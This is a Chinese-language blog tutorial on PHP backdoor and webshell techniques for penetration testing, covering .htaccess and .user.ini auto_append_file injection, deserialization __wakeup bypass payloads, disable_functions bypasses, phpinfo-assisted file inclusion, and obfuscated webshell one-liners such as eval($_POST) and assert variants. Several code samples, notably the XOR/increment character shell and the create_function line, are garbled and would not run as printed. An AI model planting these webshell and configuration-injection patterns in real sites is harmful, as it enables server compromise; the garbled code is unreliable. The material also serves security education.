php网站后门漏洞检测 渗透测试木马解决
分类专栏: 网站安全漏洞检测 网站渗透测试 渗透测试 文章标签: php安全检测 网站漏洞扫描 网站安全防护 php代码渗透测试 网站安全测试漏洞
版权
很多想做渗透测试的朋友都想了解关于PHP后门漏洞的安全测试重点方法,以及该如何预防被中php后门,本节由我们的Sine安全高级渗透工程师进行全面的讲解,来让大家更好的理解和了解php代码的安全检测,让网站得到最大化的安全保障,安全保障了,网站才能更长远的运行下去。
4.1.1. 后门
4.1.1.1. php.ini构成的后门
利用 auto_prepend_file 和 include_path
4.1.1.2. .htaccess后门
php_value auto_append_file .htaccess
#<?php phpinfo();
php_flag allow_url_include 1
php_value auto_append_file data://text/plain;,PD9waHAgcGhwaW5mbygpOw==
#php_value auto_append_file data://text/plain,%3C%3Fphp+phpinfo%28%29%3B
4.1.1.3. .user.ini文件构成的PHP后门
.user.ini可运行于所有以fastcgi运行的server。利用方式同php.in
4.1.2. 反序列化
4.1.2.1. PHP序列化实现
PHP序列化处理共有三种,分别为php_serialize、php_binary和 WDDX,默认为php_serialize,可通过配置中的 session.serialize_handler 修改。
其中php_serialize的实现在 php-src/ext/standard/var.c 中,主要函数为 php_var_serialize_intern ,序列化后的格式如下:
- boolean
- b:<value>;
- b:1; // true
- b:0; // false
- integer
- i:<value>;
- double
- d:<value>;
- NULL
- N;
- string
- s:<length>:“<value>”;
- s:1:“s”;
- array
- a:<length>:{key, value};
- a:1:{s:4:“key1”;s:6:“value1”;} // array(“key1” => “value1”);
- object
- O:<class_name_length>:"<class_name><number_of_properties>:{<properties>};
- reference
- 指针类型
- R:reference;
- O:1:“A”:2:{s:1:“a”;i:1;s:1:“b”;R:2;}
- a = new A();a=newA();a->a=1;a->b=&a->a;
4.1.2.2. PHP反序列化漏洞
php在反序列化的时候会调用 __wakeup / __sleep 等函数,可能会造成代码执行等问题。若没有相关函数,在析构时也会调用相关的析构函数,同样会造成代码执行。
另外 __toString / __call 两个函数也有利用的可能。
其中 __wakeup 在反序列化时被触发,__destruct 在GC时被触发, __toString 在echo时被触发, __call 在一个未被定义的函数调用时被触发。
下面提供一个简单的demo.
利用 auto_prepend_file 和 include_path
输出
construct
Data’s value is raw value.
destruct
string(44) “O:4:“Demo”:1:{s:4:“data”;s:9:“raw value”;}”
把序列化的字符串修改一下后,执行
unserialize(‘O:4:“Demo”:1:{s:4:“data”;s:15:“malicious value”;}’);
输出
wake up
Data’s value is malicious value.
destruct
这里看到,值被修改了.
上面是一个 unserialize() 的简单应用,不难看出,如果 __wakeup() 或者 __desturct() 有敏感操作,比如读写文件、操作数据库,就可以通过函数实现文件读写或者数据读取的行为。
那么,在 __wakeup() 中加入判断是否可以阻止这个漏洞呢?在 __wakeup() 中我们加入一行代码
但其实还是可以绕过的,在 PHP5 < 5.6.25, PHP7 < 7.0.10 的版本都存在wakeup的漏洞。当反序列化中object的个数和之前的个数不等时,wakeup就会被绕过,于是使用下面的payload
unserialize(‘O:7:“HITCON”:1:{s:4:“data”;s:15:“malicious value”;}’);
输出
Data’s value is malicious value.
destruct
这里wakeup被绕过,值依旧被修改了。
4.1.3. Disable Functions
4.1.3.1. 机制实现
PHP中Disable Function的实现是在php-src/Zend/Zend-API.c中。PHP在启动时,读取配置文件中禁止的函数,逐一根据禁止的函数名调用 zend_disable_function 来实现禁止的效果。
这个函数根据函数名在内置函数列表中找到对应的位置并修改掉,当前版本的代码如下:
和函数的实现方式类似,disable classes也是这样实现的
因为这个实现机制的原因,在PHP启动后通过 ini_set 来修改 disable_functions 或 disable_classes 是无效的。
4.1.3.2. Bypass
- LD_PRELOAD绕过
- PHP OPcache
- Mail函数
- imap_open
4.1.4. Open Basedir
4.1.4.1. 机制实现
PHP中Disable Function的实现是在php-src/main/fopen-wrappers.c中,实现方式是在调用文件等相关操作时调用函数根据路径来检查是否在basedir内,其中一部分实现代码如下:
PHPAPI int php_check_open_basedir_ex(const char *path, int warn)
{
/* Only check when open_basedir is available */
if (PG(open_basedir) && *PG(open_basedir)) {
char *pathbuf;
char *ptr;
char *end;
/* Check if the path is too long so we can give a more useful error
- message. */
if (strlen(path) > (MAXPATHLEN - 1)) {
php_error_docref(NULL, E_WARNING, “File name is longer than the maximum allowed path length on this platform (%d): %s”, MAXPATHLEN, path);
errno = EINVAL;
return -1;
}
pathbuf = estrdup(PG(open_basedir))
ptr = pathbuf;
while (ptr && *ptr) {
end = strchr(ptr, DEFAULT_DIR_SEPARATOR);
if (end != NULL) {
*end = ‘\0’;
end++;
}
if (php_check_specific_open_basedir(ptr, path) == 0) {
efree(pathbuf);
return 0;
}
ptr = end;
}
if (warn) {
php_error_docref(NULL, E_WARNING, “open_basedir restriction in effect. File(%s) is not within the allowed path(s): (%s)”, path, PG(open_basedir));
}
efree(pathbuf);
errno = EPERM; /* we deny permission to open it */
return -1;
}
/* Nothing to check… */
return 0;
}
4.1.5. phpinfo相关漏洞
4.1.5.1. Session.Save
PHP的Session默认handler为文件,存储在 php.ini 的 session.save_path 中,若有任意读写文件的权限,则可修改或读取session。从phpinfo中可获得session位置
4.1.5.2. Session.Upload
php.ini默认开启了 session.upload_progress.enabled , 该选项会导致生成上传进度文件,其存储路径可以在phpinfo中获取。
那么可以构造特别的报文向服务器发送,在有LFI的情况下即可利用。
4.1.5.3. /tmp临时文件竞争
phpinfo中可以看到上传的临时文件的路径,从而实现LFI
4.1.6. htaccess injection payload
4.1.6.1. file inclusion
利用 auto_prepend_file 和 include_path
4.1.6.2. code execution
php_value auto_append_file .htaccess
#<?php phpinfo();
4.1.6.3. file inclusion
php_flag allow_url_include 1
php_value auto_append_file data://text/plain;,PD9waHAgcGhwaW5mbygpOw==
#php_value auto_append_file data://text/plain,%3C%3Fphp+phpinfo%28%29%3B
#php_value auto_append_file /evil-code.txt
4.1.6.4. code execution with UTF-7
php_flag zend.multibyte 1
php_value zend._encoding “UTF-7”
php_value auto_append_file .htaccess
#+ADw?php phpinfo()+ADs
4.1.6.5. Source code disclosure
php_flag engine 0
4.1.7. WebShell
4.1.7.1. 常见变形
- GLOBALS
- eval($GLOBALS[‘_POST’][‘op’]);
- $_FILE
- eval($_FILE[‘name’]);
- 拆分
- assert(${“_PO”.“ST”} [‘sz’]);
- 动态函数执行
- $k=“ass”.“ert”; k(k({“_PO”.“ST”} [‘sz’]);
- create_function
- function = create_function('function=createfunction(′code’,strrev(‘lave’).‘(’.strrev('TEG_').'["code"]);');′).′["code"]);′);function();
- preg_replace
- rot13
- 进制转化
- “\x62\x61\163\x65\x36\x34\137\144\145\x63\x6f\144\145”
- 利用文件名
FILE
4.1.7.2. 字符串变形函数
- ucwords
- ucfirst
- trim
- substr_replace
- substr
- strtr
- strtoupper
- strtolower
- strtok
- str_rot13
4.1.7.3. 回调函数
- call_user_func_array
- call_user_func
- array_filter
- array_walk
- array_map
- registregister_shutdown_function
- register_tick_function
- filter_var
- filter_var_array
- uasort
- uksort
- array_reduce
- array_walk
- array_walk_recursive
4.1.7.4. 特殊字符Shell
PHP的字符串可以在进行异或、自增运算的时候,会直接进行运算,故可以使用特殊字符来构成Shell。
@$_++;
$__=(“#”“|”).(“.”“~”).(“/”“`”).(“|”“/”).(“{”^“/”);
@{__}[!_](]({__}[_]);
$_=[];
_=@"=@""; // $=‘Array’;
_==[‘!’==‘@’]; // _==[0];
___=_; // A
__=_;
__++;++;__++;;__++;__;__++;++;__++;;__++;__;__++;++;__++;;__++;__;
___.=__; // S
___.=__; // S
__=_;
__++;++;__++;++; // E
___.=__;
__=_; __++;++;__++;;__++;__;__++;++;__++;;__++;__;__++;++;__++;;$__; // R
___.=__;
__=_;__++;++;__++;;__++;__;__++;++;__++;;__++;__;__++;++;__++;;__++;__;$__++; // T
___.=__;
$___='';
__=_;
__++;++;__++;;__++;__;__++;++;__++;;__++;__;__++;++;$++; // P
____.=__;
__=_;__++;++;__++;;__++;__;__++;++;__++;;__++;__;__++;__++; // O
____.=__;
__=_;
__++;++;__++;;__++;__;__++;++;__++;;__++;__;__++;++;__++;;__++;__; // S
____.=__;
__=_;
__++;++;__++;;__++;__;__++;++;__++;;__++;__;__++;++;__++;;__++;__;$__++; // T
____.=__;
_==$____;
___(_decode([]));
4.1.8. 其它
4.1.8.1. 低精度
php中并不是用高精度来存储浮点数,而是用使用 IEEE 754 双精度格式,造成在涉及到浮点数比较的时候可能会出现预期之外的错误。比如 php -r “var_dump(0.2+0.7==0.9);” 这行代码的输出是 bool(false) 而不是 bool(true)。这在一些情况下可能出现问题。
4.1.8.2. 弱类型
如果使用 == 来判断相等,则会因为类型推断出现一些预料之外的行为,比如magic hash,指当两个md5值都是 0e[0-9]{30} 的时候,就会认为两个hash值相等。另外在判断字符串和数字的时候,PHP会自动做类型转换,那么 1==“1a.php” 的结果会是true
另外在判断一些hash时,如果传入的是数组,返回值会为 NULL, 因此在判断来自网络请求的数据的哈希值时需要先判断数据类型。
同样的, strcmp() ereg() strpos() 这些函数在处理数组的时候也会异常,返回NULL。
4.1.8.3. 命令执行
preg_replace 第一个参数是//e的时候,第二个参数会被当作命令执行
4.1.8.4. 截断
PHP字符存在截断行为,可以使用 ereg / %00 / iconv 等实现php字符截断的操作,从而触发漏洞。
4.1.8.5. 变量覆盖
当使用 extract / parse_str 等函数时,或者使用php的 $$ 特性时,如果没有正确的调用,则可能使得用户可以任意修改变量。
4.1.8.6. 执行系统命令
禁用的函数可以在phpinfo中的 disable_functions 中查看
- pcntl_exec
- exec
- passthru
- popen
- shell_exec
- system
- proc_open
4.1.8.7. Magic函数
- __construct() __destruct()
- __call() __callStatic()
- __get() __set()
- __isset() __unset()
- __sleep() __wakeup()
- __toString()
- __invoke()
- __set_state()
- __clone()
- __debugInfo()
4.1.8.8. 文件相关敏感函数
- move_uploaded_file
- file_put_contents / file_get_contents
- unlink
- fopen / fgets
4.1.8.9. php特性
- php自身在解析请求的时候,如果参数名字中包含” “、”.”、”[“这几个字符,会将他们转换成下划线,讲了那么多渗透测试中PHP后门的安全检测方法。
网络安全学习路线
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
同时每个成长路线对应的板块都有配套的视频提供:
需要网络安全学习路线和视频教程的可以在评论区留言哦~
最后
- 如果你确实想自学的话,我可以把我自己整理收藏的这些教程分享给你,里面不仅有web安全,还有渗透测试等等内容,包含电子书、面试题、pdf文档、视频以及相关的课件笔记,我都已经学过了,都可以免费分享给大家!
给小伙伴们的意见是想清楚,自学网络安全没有捷径,相比而言系统的网络安全是最节省成本的方式,因为能够帮你节省大量的时间和精力成本。坚持住,既然已经走到这条路上,虽然前途看似困难重重,只要咬牙坚持,最终会收到你想要的效果。
黑客工具&SRC技术文档&PDF书籍&web安全等(可分享)
结语
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
特别声明:
此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失